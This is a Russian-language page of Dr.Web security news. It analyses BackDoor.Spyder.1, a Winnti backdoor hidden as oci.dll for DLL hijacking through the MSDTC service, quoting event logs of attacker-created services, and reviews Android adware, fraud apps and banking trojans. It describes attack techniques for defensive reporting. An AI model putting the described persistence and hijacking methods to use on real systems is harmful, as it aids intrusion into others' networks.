Исследование Spyder — модульного бэкдора для целевых атак |
4 марта 2021 года
Мы уже касались деятельности Winnti, когда исследовали образцы бэкдора ShadowPad, найденные нами в скомпрометированной сети государственного учреждения Киргизии. Кроме того, ранее в этой же сети мы обнаружили другой специализированный бэкдор — PlugX, имеющий с ShadowPad множество пересечений в коде и сетевой инфраструктуре. Сравнительному анализу обоих семейств был посвящен отдельный материал.
В этом исследовании мы проведем анализ найденного вредоносного модуля, рассмотрим алгоритмы и особенности его работы и выявим его связь с другими известными инструментами APT-группы Winnti.
На зараженном устройстве вредоносный модуль располагался в системной директории C:\Windows\System32 под именем oci.dll. Таким образом, модуль был подготовлен для запуска системной службой MSDTC (Microsoft Distributed Transaction Coordinator) при помощи метода DLL Hijacking. По нашим данным, файл попал на компьютеры в мае 2020 года, однако способ первичного заражения остался неизвестным. В журналах событий обнаружились записи о создании служб, предназначенных для старта и остановки MSDTC, а также для исполнения бэкдора.
Log Name: System
Source: Service Control Manager
Date: 23.11.2020 5:45:17
Event ID: 7045
Task Category: None
Level: Information
Keywords: Classic
User:
Computer:
Description:
A service was installed in the system.
Service Name: IIJVXRUMDIKZTTLAMONQ
Service File Name: net start msdtc
Service Type: user mode service
Service Start Type: demand start
Service Account: LocalSystem
Log Name: System
Source: Service Control Manager
Date: 23.11.2020 5:42:20
Event ID: 7045
Task Category: None
Level: Information
Keywords: Classic
User:
Computer:
Description:
A service was installed in the system.
Service Name: AVNUXWSHUNXUGGAUXBRE
Service File Name: net stop msdtc
Service Type: user mode service
Service Start Type: demand start
Service Account: LocalSystem
Также были найдены следы запуска других служб со случайными именами, их файлы располагались в директориях вида C:\Windows\Temp\
Интересной находкой стала служба, свидетельствующая об использовании утилиты для удаленного исполнения кода smbexec.py из состава набора Impacket. С её помощью злоумышленники организовали удаленный доступ к командной оболочке в полуинтерактивном режиме.
Исследуемый вредоносный модуль oci.dll был добавлен в вирусную базу Dr.Web как BackDoor.Spyder.1. В одном из найденных нами образцов этого семейства остались функции ведения отладочного журнала и сами сообщения, при этом те из них, которые использовались при коммуникации с управляющим сервером, содержали строку «Spyder».
Бэкдор примечателен рядом интересных особенностей. Во-первых, oci.dll содержит основной PE-модуль, но с отсутствующими файловыми сигнатурами. Заполнение сигнатур заголовка нулями, предположительно, было сделано с целью затруднения детектирования бэкдора в памяти устройства. Во-вторых, полезная нагрузка сама по себе не несет вредоносной функциональности, но служит загрузчиком и координатором дополнительных плагинов, получаемых от управляющего сервера. С помощью этих подключаемых плагинов бэкдор выполняет основные задачи. Таким образом, это семейство имеет модульную структуру, так же как и другие семейства бэкдоров, используемые Winnti, — упомянутые ранее ShadowPad и PlugX.
Анализ сетевой инфраструктуры Spyder выявил связь с другими атаками Winnti. В частности инфраструктура, используемая бэкдорами Crosswalk и ShadowPad, описанными в исследовании Positive Technologies, перекликается с некоторыми образцами Spyder. График ниже наглядно показывает выявленные пересечения.
Подробное техническое описание BackDoor.Spyder.1 находится в PDF-версии исследования и в вирусной библиотеке Dr.Web.
Рассмотренный образец бэкдора для целевых атак BackDoor.Spyder.1 примечателен в первую очередь тем, что его код не исполняет прямых вредоносных функций. Его основные задачи — скрытое функционирование в зараженной системе и установление связи с управляющим сервером с последующим ожиданием команд операторов. При этом он имеет модульную структуру, что позволяет масштабировать его возможности, обеспечивая любую функциональность в зависимости от нужд атакующих. Наличие подключаемых плагинов роднит рассмотренный образец с ShadowPad и PlugX, что, вкупе с пересечениями сетевых инфраструктур, позволяет нам сделать вывод о его принадлежности к деятельности Winnti.
|
|
«Доктор Веб»: обзор вирусной активности в январе 2021 года |
24 февраля 2021 года
В январе анализ данных статистики Dr.Web показал увеличение общего числа обнаруженных угроз на 4.92% по сравнению с декабрем. Количество уникальных угроз также выросло — на 13.11%. По общему количеству детектирований продолжают лидировать рекламные программы и вредоносные расширения для браузеров. В почтовом трафике на первых позициях находятся различные модификации стилеров семейства AgentTesla, бэкдор, написанный на VB.NET, а также программы, использующие уязвимости документов Microsoft Office.
Число обращений пользователей за расшифровкой файлов увеличилось на 29.27% по сравнению с декабрем. Самым распространенным энкодером остается Trojan.Encoder.26996, на долю которого приходится 24.11% всех инцидентов.
Угрозы прошедшего месяца:
Запросов на расшифровку файлов от пользователей, пострадавших от шифровальщиков, в январе в антивирусную лабораторию «Доктор Веб» поступило на 29.27% больше, чем в декабре.
В течение января 2021 года интернет-аналитики «Доктор Веб» выявили множество мошеннических и фишинговых сайтов, при помощи которых злоумышленники похищали деньги и персональные данные пользователей. Чаще всего посетителям предлагалось получить несуществующую выплату от государства или перевод от частного лица. Во всех случаях для получения обещанных выплат требовалось оплатить комиссию.
Кроме того, в январе аналитики обнаружили несколько веб-сайтов несуществующих банков. Злоумышленники регистрировали сайты в домене .рф и использовали один и тот же шаблон для создания однотипных страниц, отличающихся лишь вымышленными названиями банков. Эти мошеннические ресурсы предназначались для кражи средств со счетов доверчивых пользователей.
Также в январе было выявлено множество поддельных служб переводов, маскирующихся под онлайн-кассы. Эти сайты часто использовались в связке с мошенническими торговыми площадками и позволяли похищать не только деньги, но и данные банковских карт пользователей.
По сравнению с декабрем в январе на Android-устройствах было выявлено на 11.32% меньше угроз. При этом в числе наиболее распространенных оказались вредоносные приложения, способные загружать другое ПО и выполнять произвольный код, а также трояны, демонстрировавшие рекламу.
В течение прошлого месяца специалисты компании «Доктор Веб» обнаружили в каталоге Google Play множество вредоносных приложений семейства Android.FakeApp, загружавших мошеннические сайты. Кроме того, были выявлены очередные многофункциональные трояны, принадлежащие семейству Android.Joker. Одна из их функций — подписка пользователей на дорогостоящие мобильные услуги. Кроме того, злоумышленники распространяли приложения со встроенными в них нежелательными рекламными модулями, получившими имя Adware.NewDich.
Эти модули загружали в веб-браузере различные сайты, среди которых могли оказаться как безобидные, так и вредоносные и мошеннические веб-ресурсы, а также сайты с рекламой.
Активность проявили и различные банковские трояны. Одного из них вирусные аналитики «Доктор Веб» обнаружили в Google Play, других вирусописатели распространяли через вредоносные сайты.
Наиболее заметные события, связанные с «мобильной» безопасностью в январе:
Более подробно о вирусной обстановке для мобильных устройств в январе читайте в нашем обзоре.
|
|
«Доктор Веб»: обзор вирусной активности для мобильных устройств в январе 2021 года |
24 февраля 2021 года
В январе антивирусные продукты Dr.Web для Android зафиксировали на защищаемых устройствах на 11,32% меньше угроз по сравнению с декабрем прошлого года. Число обнаруженных вредоносных приложений снизилось на 11,5%, а рекламных - на 15,93%. При этом количество выявленных нежелательных и потенциально опасных программ возросло на 11,66% и 7,26% соответственно. Согласно полученной статистике, наиболее часто пользователи сталкивались с троянами, демонстрировавшими рекламу, а также с вредоносными приложениями, которые загружали другое ПО и выполняли произвольный код.
В течение предыдущего месяца вирусные аналитики компании «Доктор Веб» обнаружили в каталоге Google Play множество угроз. Среди них - многочисленные модификации рекламных модулей семейства Adware.NewDich, которые распространялись в составе программ для ОС Android. Кроме того, были выявлены новые трояны семейства Android.FakeApp, загружавшие мошеннические сайты, а также вредоносные приложения семейства Android.Joker, подписывавшие пользователей на дорогостоящие мобильные услуги и выполнявшие произвольный код.
Вместе с тем наши специалисты зафиксировали очередные атаки с применением банковских троянов. Один из них был найден в поддельном банковском приложении, размещенном в Google Play, другие распространялись через вредоносные сайты, созданные злоумышленниками.
В начале января вирусные аналитики компании «Доктор Веб» обнаружили в каталоге Google Play приложения со встроенными в них рекламными модулями семейства Adware.NewDich, которые по команде управляющего сервера загружают в браузере различные веб-сайты. Это могут быть как безобидные интернет-ресурсы, так и сайты с рекламой или мошеннические сайты, используемые для фишинга. Их загрузка происходит, когда пользователи не работают с приложениями, содержащими Adware.NewDich. Из-за этого становится сложнее определить причину странного поведения Android-устройств.
Примеры приложений, в которых были найдены такие рекламные модули:
Примеры загружаемых ими сайтов:
Среди разнообразия веб-ресурсов, загружаемых модулями Adware.NewDich, часто встречаются страницы партнерских и рекламных сервисов, которые перенаправляют пользователей на разделы размещенных в Google Play программ. Одной из них было приложение под названием YBT Exchange, якобы предназначенное для работы с одной из криптобирж. Однако вирусные аналитики компании «Доктор Веб» выяснили, что это не что иное как банковский троян - он получил имя Android.Banker.3684. В его функции входил перехват вводимых логинов, паролей, одноразовых проверочных кодов, а также содержимого поступающих уведомлений, для чего троян запрашивал соответствующее системное разрешение. После нашего обращения в корпорацию Google банкер был удален из каталога.
Вирусные аналитики «Доктор Веб» выяснили, что различные модификации этих модулей присутствовали как минимум в 21 программе. Исследование показало, что с большой долей вероятности их владельцы непосредственно связаны и с разработкой Adware.NewDich. После того как рекламная платформа привлекла внимание специалистов по информационной безопасности, ее администраторы запаниковали и начали выпускать обновления приложений, в которых старались «сбить» детектирование антивирусов или полностью исключали из них рекламный модуль. Одна из затронутых программ в дальнейшем была удалена из каталога. Вместе с тем ничто не мешает злоумышленникам выпускать новые версии ПО, в которых Adware.NewDich будет присутствовать вновь, что уже несколько раз наблюдали наши специалисты.
Список программ с обнаруженными в них модулями Adware.NewDich:
| Имя пакета | Наличие модуля Adware.NewDich | Приложение удалено из Google Play |
|---|---|---|
| com.qrcodescanner.barcodescanner | Присутствовал в последней актуальной версии 1.75 | Да |
| com.speak.better.correctspelling | Присутствует в актуальной версии 679.0 | Нет |
| com.correct.spelling.learn.english | Присутствует в актуальной версии 50.0 | Нет |
| com.bluetooth.autoconnect.anybtdevices | Присутствует в актуальной версии 2.5 | Нет |
| com.bluetooth.share.app | Присутствует в актуальной версии 1.8 | Нет |
| org.strong.booster.cleaner.fixer | Отсутствует в актуальной версии 5.9 | Нет |
| com.smartwatch.bluetooth.sync.notifications | Отсутствует в актуальной версии 85.0 | Нет |
| com.blogspot.bidatop.nigeriacurrentaffairs2018 | Присутствует в актуальной версии 3.2 | Нет |
| com.theantivirus.cleanerandbooster | Отсутствует в актуальной версии 9.3 | Нет |
| com.clean.booster.optimizer | Отсутствует в актуальной версии 9.1 | Нет |
| flashlight.free.light.bright.torch | Отсутствует в актуальной версии 66.0 | Нет |
| com.meow.animal.translator | Отсутствует в актуальной версии 1.9 | Нет |
| com.gogamegone.superfileexplorer | Отсутствует в актуальной версии 2.0 | Нет |
| com.super.battery.full.alarm | Отсутствует в актуальной версии 2.2 | Нет |
| com.apps.best.notepad.writing | Отсутствует в актуальной версии 7.7 | Нет |
| ksmart.watch.connecting | Отсутствует в актуальной версии 32.0 | Нет |
| com.average.heart.rate | Отсутствует в актуальной версии 7.0 | Нет |
| com.apps.best.alam.clocks | Отсутствует в актуальной версии 4.7 | Нет |
| com.booster.game.accelerator.top | Отсутствует в актуальной версии 2.1 | Нет |
| org.booster.accelerator.optimizer.colorful | Отсутствует в актуальной версии 61.0 | Нет |
| com.color.game.booster | Отсутствует в актуальной версии 2.1 | Нет |
Особенности модулей Adware.NewDich:
Программные модули, встраиваемые в Android-приложения и предназначенные для показа навязчивой рекламы на мобильных устройствах. В зависимости от семейства и модификации они могут демонстрировать рекламу в полноэкранном режиме, блокируя окна других приложений, выводить различные уведомления, создавать ярлыки и загружать веб-сайты.
Помимо приложений с рекламными модулями Adware.NewDich в январе специалисты «Доктор Веб» выявили в каталоге Google Play множество новых троянов семейства Android.FakeApp, которые распространялись под видом ПО с информацией о социальных выплатах, льготах, возврате НДС и других денежных компенсациях. При этом среди них встречались и другие модификации — например, выдаваемые за программы для поиска информации о лотереях и получения подарков от популярных блогеров.
Как и другие аналогичные трояны, обнаруженные ранее, последние версии загружали мошеннические сайты, где потенциальным жертвам сообщалось о якобы доступных для них выплатах от государства. Для «получения» денег им предлагалось указать персональную информацию, а также оплатить работу юристов, оформление документов, госпошлину или комиссию за перевод на банковский счет. На самом деле никаких средств пользователи не получали, и злоумышленники похищали у них конфиденциальные данные и деньги.
Некоторые модификации этих вредоносных приложений периодически демонстрировали уведомления, в которых также сообщалось о доступных выплатах и компенсациях. Таким образом киберпреступники пытались привлечь дополнительное внимание потенциальных жертв, чтобы те чаще переходили на мошеннические сайты.
Примеры сайтов, загружаемых различными модификациями троянов Android.FakeApp:
Примеры мошеннических уведомлений с информацией о «выплатах» и «компенсациях», которые демонстрируют эти вредоносные приложения:
Кроме того, были обнаружены очередные многофункциональные трояны, принадлежащие к семейству Android.Joker и получившие имена Android.Joker.496, Android.Joker.534 и Android.Joker.535. Они распространялись под видом безобидных приложений — программ-переводчиков и мультимедийного редактора для создания gif-анимации. Однако настоящими их функциями были загрузка и выполнение произвольного кода, а также перехват содержимого уведомлений и подписка пользователей на премиум-услуги.
Среди выявленных угроз оказался и новый троян, добавленный в вирусную базу Dr.Web как Android.Banker.3679. Он распространялся под видом приложения для работы с бонусной программой Esfera банка Santander и предназначался для бразильских пользователей. Основными функциями Android.Banker.3679 являлись фишинг и кража конфиденциальных данных, а его целью было банковское приложение Santander Empresas.
После установки и запуска троян запрашивал доступ к специальным возможностям ОС Android — якобы для продолжения работы с приложением. На самом деле они были нужны ему для автоматического выполнения вредоносных действий. Если жертва соглашалась предоставить ему необходимые полномочия, банкер получал контроль над устройством и мог самостоятельно нажимать на различные элементы меню, кнопки, считывать содержимое окон приложений и т. д.
Наряду с банковскими троянами, выявленными в Google Play, владельцам Android-устройств угрожали банкеры, которые распространялись через вредоносные сайты. Например, специалисты компании «Доктор Веб» зафиксировали очередные атаки на японских пользователей, где применялись вредоносные приложения из различных семейств — Android.BankBot.3954, Android.SmsSpy.833.origin, Android.SmsSpy.10809, Android.Spy.679.origin и другие. Они загружались с поддельных сайтов курьерских и почтовых служб под видом обновлений браузера Chrome, программы Play Маркет и прочего безобидного ПО.
Для защиты Android-устройств от вредоносных и нежелательных программ пользователям следует установить антивирусные продукты Dr.Web для Android.
|
|
Dr.Web и АКАДО подвели итоги года |
Москва, 28 января 2021 года.
По данным, полученным c сервера Dr.Web AV-Desk – программного обеспечения, обеспечивающего комплексную защиту, - в 2020 году было выявлено свыше 12 000 попыток проникновения вредоносного ПО на компьютеры абонентов АКАДО.
«Больше половины атак, 65%, приходится на потенциально опасные программы, значительную часть которых составляют различные приложения для майнинга криптовалют. Эти приложения могут быть загружены и запущены без ведома владельца компьютера, например, троянскими программами для добычи криптовалюты в пользу злоумышленников. В 20% случаев пользователей пытались атаковать трояны-дропперы и загрузчики, которые устанавливали вредоносные приложения с сомнительных сайтов. Оставшиеся 15% угроз пришлись на рекламные программы – они распространялись под видом различных приложений», - отметила Евгения Хамракулова, руководитель направления технологических партнерств «Доктор Веб».
Анализ данных по месяцам показывает резкие всплески вредоносной активности в марте и октябре, связанные с началом всеобщей самоизоляции и усилением ограничений. Так, например, при попытках пользователей скачать с сомнительных сайтов программу для видеоконференций Zoom были зафиксированы случаи загрузки рекламных приложений. Пользователям предлагалось установить ненужные и, чаще всего, неоригинальные (опасные) программы.
Наиболее спокойным в плане вредоносной активности выдался июль, так как именно на этот месяц приходится пик отпусков, а школьные каникулы находятся в самом разгаре.
«Проанализировав совместно с партнером, компанией «Доктор Веб», характер и количество интернет-угроз, специалисты в области информационной безопасности АКАДО также рекомендуют скачивать только известные программы с официальных сайтов, не посещать сомнительные интернет-ресурсы, не открывать письма от незнакомых отправителей, особенно, если такие письма содержат ссылки. Как правило, эти ссылки ведут на различные вредоносные сайты. Для комфортной и безопасной работы в интернете мы предлагаем ряд пакетных предложений, в которые уже входят антивирусные программы, в том числе и от одного из лидеров отрасли – компании «Доктор Веб», - добавил директор по продажам услуг и обслуживанию на массовом рынке «АКАДО Телеком» Алексей Лапшин.
«АКАДО Телеком» (www.akado.ru, www.akado-telecom.ru) - одна из ведущих телекоммуникационных корпораций Москвы, первый частный оператор кабельного телевидения столицы. Входит в число ключевых подрядчиков Правительства Москвы, в ТОП интернет- и ТВ-провайдеров столицы.
Транспортная сеть АКАДО – одна из самых крупных в Москве по протяженности.
Компания оказывает широкий спектр цифровых услуг и сервисов. Услугами компании пользуются абоненты-физические лица (в зоне действия сети АКАДО около 3 млн домохозяйств), представители крупного, среднего и малого бизнеса, государственные организации.
|
|
«Доктор Веб»: обзор вирусной активности для мобильных устройств за 2020 год |
29 декабря 2020 года
В 2020 году в числе наиболее распространенных вредоносных программам для ОС Android оказались трояны, с помощью которых злоумышленники получали нелегальный заработок. Среди них - вредоносные приложения, созданные для скачивания и запуска произвольного кода, а также загрузки и установки ПО без ведома пользователей. Наряду с ними вирусописатели активно применяли различные рекламные трояны и вредоносные программы-кликеры, выполняющие загрузку веб-сайтов и автоматические переходы по ссылкам.
Серьезную опасность для пользователей представляли бэкдоры, позволяющие злоумышленникам дистанционно управлять зараженными устройствами, а также трояны, превращающие гаджеты в прокси-серверы, через которые киберпреступники перенаправляли трафик.
Актуальной остается проблема кибершпионажа. За последние 12 месяцев владельцы Android-устройств столкнулись со множеством программ, позволяющих следить за ними и контролировать их действия. Многие из таких приложений не являются вредоносными, но представляют потенциальную опасность, поскольку могут применяться как с разрешения пользователей, так и без их ведома.
Не обошлось и без новых угроз в Google Play - официальном каталоге программ и другого цифрового контента для ОС Android. Он считается наиболее надежным источником приложений и игр для Android-устройств, однако злоумышленникам по-прежнему удается добавлять в него вредоносное и нежелательное ПО. Среди угроз, которые в нем обнаружили специалисты компании «Доктор Веб», было множество рекламных троянов, мошеннических приложений и вредоносных программ, подписывающих пользователей на платные сервисы и загружающих дополнительные компоненты. Кроме того, через Google Play распространялись банковские трояны и программы со встроенными нежелательными рекламными модулями.
В 2020 году для распространения различных вредоносных программ злоумышленники активно эксплуатировали тему пандемии коронавируса. На ее фоне распространялись банковские трояны, трояны-вымогатели, трояны-шпионы, мошенническое ПО и другие угрозы.
В марте вирусные аналитики компании «Доктор Веб обнаружили в каталоге Google Play новый на тот момент многофункциональный троян Android.Circle.1, распространявшийся под видом сборников изображений, астрологических программ, игр, утилит и других полезных приложений. Попадая на Android-устройства, он получал от злоумышленников команды с BeanShell-скриптами, которые затем исполнял. Например, Android.Circle.1 мог показывать рекламу и загружать веб-сайты, на которых имитировал действия пользователей - автоматически переходил по ссылкам и нажимал на рекламные баннеры.
В течение года наши вирусные аналитики обнаружили и другие аналогичные вредоносные приложения, принадлежащие к тому же семейству, что и Android.Circle.1.
В мае специалисты «Доктор Веб» зафиксировали распространение новой версии вредоносной программы Android.FakeApp.176, известной на протяжении нескольких лет. Для привлечения пользователей мошенники выдают ее за известные программы и игры. Очередную модификацию трояна злоумышленники продвигали под видом мобильной версии игры Valorant и рекламировали ее через видеохостинг YouTube.
Единственная функция Android.FakeApp.176 - загрузка веб-сайтов партнерских сервисов, где посетителям предлагается выполнить определенные задания: установить ту или иную игру, приложение или пройти опрос. За каждое успешно выполненное задание участники партнерской схемы получают вознаграждение. В случае с Android.FakeApp.176 мошенничество заключалось в том, что за выполнение заданий троян обещал пользователям доступ к игре, которой еще даже не существовало. В результате жертвы такого обмана не получали ожидаемую награду и лишь помогали вирусописателям заработать.
Уже в декабре компания «Доктор Веб» сообщила о трояне Android.Mixi.44.origin, найденном в приложении для заботы о зрении пользователей Android-устройств. Он незаметно переходил по ссылкам и загружал веб-сайты, которые демонстрировал поверх окон других программ. Кроме того, троян следил, какие приложения устанавливает пользователь, и пытался присвоить каждую установку злоумышленникам, за что те получали вознаграждение от партнерских и рекламных сервисов.
За прошедшие 12 месяцев специалисты «Доктор Веб» выявили множество угроз в каталоге Google Play. Среди них — рекламные трояны Android.HiddenAds, демонстрирующие баннеры поверх окон других приложений, многофункциональные трояны Android.Joker, подписывающие пользователей на дорогостоящие мобильные услуги и выполняющие произвольный код, а также другие вредоносные и нежелательные программы.
Воспользовавшись проблемой пандемии SARS-CoV-2, на протяжении всего года киберпреступники активно распространяли различные вредоносные приложения для ОС Android, выдавая их за полезное ПО.
Например, в марте пользователей атаковал троян-вымогатель Android.Locker.7145. Вирусописатели распространяли его под видом приложения, позволяющего отслеживать статистику заражений коронавирусом. Однако вместо этого он зашифровывал хранящиеся на Android-устройствах файлы и требовал за их восстановление выкуп в размере $250.
В мае был обнаружен троян-шпион Android.Spy.660.origin, главной целью которого были пользователи из Узбекистана. В отличие от Android.Locker.7145, он скрывался в программе, которая действительно предоставляла статистику по числу заболевших коронавирусом людей. Однако наряду с этой функцией Android.Spy.660.origin также собирал и передавал на удаленный сервер СМС-сообщения, журнал телефонных вызовов и список контактов из записной книги.
Другая «ковидная» вредоносная программа-шпион - Android.Spy.772.origin - атаковала франкоязычных пользователей. Злоумышленники распространяли ее через мошеннический веб-сайт, имитирующий французский информационный онлайн-ресурс о коронавирусе. Android.Spy.772.origin скачивался с сайта-подделки под видом приложения, предназначенного для проверки симптомов и выявления возможного заражения.
Однако троян после запуска лишь загружал в своем окне настоящий информационный веб-сайт и начинал следить за жертвой. Он передавал злоумышленникам различную конфиденциальную информацию, в том числе содержимое СМС-сообщений, данные о местоположении, телефонных звонках и контактах из телефонной книги. Кроме того, он мог выполнять прослушивание, записывая окружение через встроенный в устройство микрофон, а также производить фото- и видеосъемку.
Среди распространявшихся на фоне пандемии вредоносных программ было и множество банковских троянов. Один из них - Android.BankBot.2550 - являлся очередной модификацией многофункционального Android-банкера, известного под именем Anubis. Наши специалисты зафиксировали случаи, когда для его распространения вирусописатели применяли социальные сети, такие как Twitter. Киберпреступники предлагали потенциальным жертвам перейти на созданные ими сайты и установить ту или иную программу, якобы связанную с информацией о коронавирусе. В действительности пользователи загружали на свои устройства вредоносное приложение, которое похищало их деньги и персональную информацию.
Android.BankBot.2550 демонстрировал фишиговые окна для кражи логинов, паролей и сведений о банковских картах, перехватывал СМС-сообщения, мог создавать скриншоты экрана, самостоятельно отключать встроенную в ОС Android защиту Google Play Protect, перехватывать вводимую информацию и выполнять другие вредоносные действия.
Кроме того, «ковидные» банковские трояны распространялись и под видом приложений, с помощью которых пользователи якобы могли получить материальную поддержку от государства. В условиях пандемии и связанной с ней непростой экономической обстановки правительства многих стран действительно выделяли средства для поддержки населения, чем и воспользовались злоумышленники. Например, под видом приложений для получения социальной помощи распространялись банкеры Android.BankBot.684.origin и Android.BankBot.687.origin, атаковавшие жителей Турции. Они также загружались на Android-устройства жертв с вредоносных веб-сайтов.
Эти трояны пытались похитить логины и пароли от учетных записей мобильного банкинга, показывая фишинговые окна поверх банковских приложений. Кроме того, они могли красть данные о банковских картах, перехватывать и отправлять СМС-сообщения, выполнять USSD-запросы, блокировать экран зараженного устройства и выполнять другие действия по команде киберпреступников.
Тему социальных выплат в период пандемии эксплуатировали и более заурядные мошенники. В частности, они активно распространяли различные модификации вредоносных программ семейства Android.FakeApp. В течение 2020 года специалисты компании «Доктор Веб» выявили множество таких троянов в каталоге Google Play. Чаще всего злоумышленники выдавали их за программы-справочники с информацией о получении пособий, различных денежных компенсаций и возврате НДС. Многие из этих троянов предназначались для пользователей из России, где государство тоже оказало поддержку населению. Пытаясь найти информацию о выплатах, жертвы мошенников устанавливали себе троянов.
Такие вредоносные приложения загружали мошеннические веб-сайты, на которых предлагалось указать персональные данные — якобы для проверки доступности той или иной компенсации или выплаты. После их ввода имитировался поиск по «базе», и пользователям предлагалось указать данные банковской карты для оплаты комиссии за «перевод» денег на их счет или же оплаты пошлины за «оформление» документов. На самом деле никаких выплат и компенсаций жертвы не получали. Они просто лишались денег и передавали злоумышленникам свои конфиденциальные данные.
Согласно статистике детектирований антивирусных продуктов Dr.Web для Android, в 2020 году на Android-устройствах чаще всего обнаруживались различные вредоносные программы. На их долю пришлось 80,72% всех выявленных угроз. Вторыми по распространенности стали рекламные приложения с долей в 15,38%. На третьем месте расположились потенциально опасные программы - они обнаруживались на защищаемых устройствах в 3,46% случаев. Реже всего пользователи сталкивались с нежелательным ПО - на его долю пришлось 0,44% детектирований.
Среди вредоносных приложений преобладали трояны, способные скачивать и выполнять произвольный код, а также загружать и устанавливать другие программы. На их долю пришлось свыше 50% от обнаруженного на Android-устройствах вредоносного ПО. Наиболее распространенными среди них были представители семейств Android.RemoteCode, Android.Triada, Android.DownLoader и Android.Xiny.
Кроме того, в числе самых активных оказались трояны, показывающие нежелательную рекламу. Они составили почти четверть всех выявленных вредоносных приложений. Среди таких троянов были многочисленные представители семейств Android.HiddenAds и Android.MobiDash.
Среди наиболее распространенных нежелательных программ оказались приложения, которые сообщали о несуществующих угрозах и предлагали «вылечить» Android-устройства, купив полную версию этих программ. Кроме того, часто выявлялись различные шпионские приложения.
Среди потенциально опасного ПО наиболее распространенными стали программы, способные запускать другое приложения без их установки. Кроме того, антивирусные продукты Dr.Web для Android обнаружили на Android-устройствах множество программ, защищенных специальными упаковщиками и обфускаторами. Такие утилиты часто используют вирусописатели, чтобы защитить вредоносное и нежелательное ПО от обнаружения антивирусами.
Среди рекламного ПО наибольшее распространение получили программные модули, которые демонстрировали рекламу в панели уведомлений Android-устройств, а также показывали баннеры поверх окон других программ и интерфейса операционной системы.
В 2020 году интенсивность атак с применением банковских троянов сохранялась примерно на одном уровне на протяжении первых трех кварталов. В этом временном промежутке лишь весной произошел определенный всплеск их активности, который совпал с началом пандемии.
С наступлением осени и приходом второй волны коронавируса наблюдался значительный рост детектирований этих вредоносных приложений, продолжившийся до конца года. При этом пик распространения банковских троянов пришелся на сентябрь. Это объясняется тем, что в августе в открытый доступ попал исходный код банкера Cerberus, что привело к появлению множества новых вредоносных программ, созданных на его основе. Различные модификации этого трояна детектируются антивирусными продуктами Dr.Web для Android как представители семейства Android.BankBot.
Банкеры попадали на Android-устройства различными способами. В том числе – путем загрузки с вредоносных сайтов. Наряду с отмеченными ранее мошенническими веб-ресурсами с информацией о коронавирусе злоумышленники создавали множество других поддельных сайтов. Например, распространявшийся в мае среди вьетнамских пользователей троян Android.Banker.388.origin скачивался на устройства при посещении поддельного сайта Министерства общественной безопасности.
А киберпреступники, атаковавшие японских пользователей, на протяжении всего года создавали поддельные сайты почтовых сервисов и курьерских компаний, при посещении которых происходила загрузка Android-банкеров.
Другой вектор их распространения — через каталог Google Play. Например, в июне вирусные аналитики компании «Доктор Веб» обнаружили там сразу нескольких банковских троянов. Одним из них был Android.BankBot.3260, которого киберпреступники выдавали за приложение для заметок. Другой — Android.BankBot.733.origin — распространялся под видом программы для установки системных обновлений и программ, а также защиты от угроз.
А в июле был найден троян Android.Banker.3259, скрывавшийся в приложении для управления телефонными звонками и СМС.
Киберпреступники непрерывно ищут способы защиты вредоносных приложений. В 2021 году можно ожидать появления большего числа многокомпонентных угроз, а также троянов, защищенных различными упаковщиками, затрудняющими обнаружение антивирусами.
Вирусописатели продолжат использовать вредоносные приложения для получения нелегального заработка. В результате пользователи столкнутся с новыми рекламными троянами, всевозможными загрузчиками ПО и кликерами, применяемыми в различных преступных схемах монетизации.
Останется актуальной проблема кибершпионажа и таргетированных атак. Возможно появление вредоносных приложений, которые будут использовать уязвимости ОС Android для заражения устройств. Для защиты от Android-угроз рекомендуется применять антивирусные средства Dr.Web для Android, а также устанавливать все актуальные обновления операционной системы и используемых программ.
|
|
«Доктор Веб»: обзор вирусной активности за 2020 год |
29 декабря 2020 года
В 2020 году одними из самых распространенных угроз, с которыми массово сталкивались пользователи, стали трояны-дропперы, распространяющие и устанавливающие другое вредоносное ПО, многочисленные рекламные приложения, мешающие нормальной работе устройств, а также различные модификации троянов-загрузчиков, запускающих в инфицированной системе исполняемые файлы с набором вредоносных функций. Кроме того, на протяжении всего года хакерские группировки активно распространяли троянские программы, использующие функциональность популярных утилит для удаленного администрирования. Так, вирусная лаборатория «Доктор Веб» зафиксировала несколько атак с использованием RAT-троянов, которые позволяют злоумышленникам дистанционно управлять зараженными компьютерами и доставлять на них вредоносную нагрузку.
Также в этом году вирусные аналитики «Доктор Веб» расследовали несколько масштабных целевых атак, направленных на корпоративный сектор. В ходе работы были выявлены несколько семейств троянов, которыми были инфицированы компьютеры различных государственных учреждений.
В почтовом трафике самыми активными угрозами оказались банковские трояны, стилеры, различные модификации бэкдоров, написанные на VB.NET, а также вредоносные сценарии, перенаправляющие пользователей на опасные и нежелательные сайты. Кроме того, посредством электронной почты злоумышленники активно распространяли программы, эксплуатирующие уязвимости документов Microsoft Office.
Несмотря на то, что большая часть выявленных угроз представляла опасность для пользователей ОС Windows, владельцы компьютеров под управлением macOS также были в зоне риска. В течение года были обнаружены трояны-шифровальщики и шпионские программы, работающие под управлением macOS, а также руткиты, которые скрывали работающие процессы. Также под видом разнообразных приложений активно распространялись рекламные установщики, которые загружали на компьютеры различную потенциально опасную нагрузку. В большинстве случаев под угрозой находились те пользователи, которые отключали встроенные системы безопасности и загружали приложения из недоверенных источников.
Пользователям мобильных устройств на базе ОС Android угрожали рекламные, шпионские и банковские троянские программы, а также всевозможные загрузчики, которые скачивали другие вредоносные приложения и выполняли произвольный код. Значительная часть вредоносного ПО распространялась через каталог Google Play.
В феврале вирусные аналитики «Доктор Веб» сообщили о компрометации ссылки на скачивание программы для обработки видео и звука VSDC в каталоге популярного сайта CNET. Вместо оригинальной программы посетители сайта загружали измененный установщик с вредоносным содержимым, позволяющим злоумышленникам дистанционно управлять инфицированными компьютерами. Управление было реализовано при помощи компонентов программы TeamViewer и троянской библиотеки семейства BackDoor.TeamViewer, которая устанавливала несанкционированное соединение. При помощи бэкдора злоумышленники могли доставлять на зараженные устройства полезную нагрузку в виде других вредоносных приложений.
В марте специалисты «Доктор Веб» рассказали о компрометации ряда сайтов, созданных на CMS WordPress. JavaScript-сценарий, встроенный в код взломанных страниц, перенаправлял посетителей на фишинговую страницу, где пользователям предлагалось установить важное обновление безопасности для браузера Chrome. Загружаемый файл представлял собой установщик вредоносного ПО, которое позволяло дистанционно управлять инфицированными компьютерами. В этот раз злоумышленники вновь использовали легитимные компоненты TeamViewer и троянскую библиотеку, которая устанавливала соединение и скрывала от пользователей работу программы.
